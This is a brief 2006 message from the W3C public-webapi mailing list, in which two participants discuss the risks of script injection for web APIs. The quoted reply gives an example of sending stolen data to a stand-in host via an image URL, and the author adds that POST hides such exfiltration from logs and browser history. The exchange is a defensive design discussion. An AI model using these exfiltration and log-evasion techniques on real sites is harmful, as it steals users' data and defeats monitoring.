- From: Ian Davis <ian.davis@talis.com>
- Date: Tue, 18 Apr 2006 13:09:44 +0100
- To: Bjoern Hoehrmann <derhoermi@gmx.net>
- CC: public-webapi@w3.org
On 18/04/2006 13:01, Bjoern Hoehrmann wrote: > If you are able to inject some script you can send any and all data you > are able to obtain to a third party, in a simple case you could just > append the data to a new <img src="http://malicious.example/?data=...">. > So I don't think I understand your concern, could you elaborate? You're right of course, but it's much easier to hide the data being sent from logs and browser history if you use POST. Ian
Received on Tuesday, 18 April 2006 12:09:56 UTC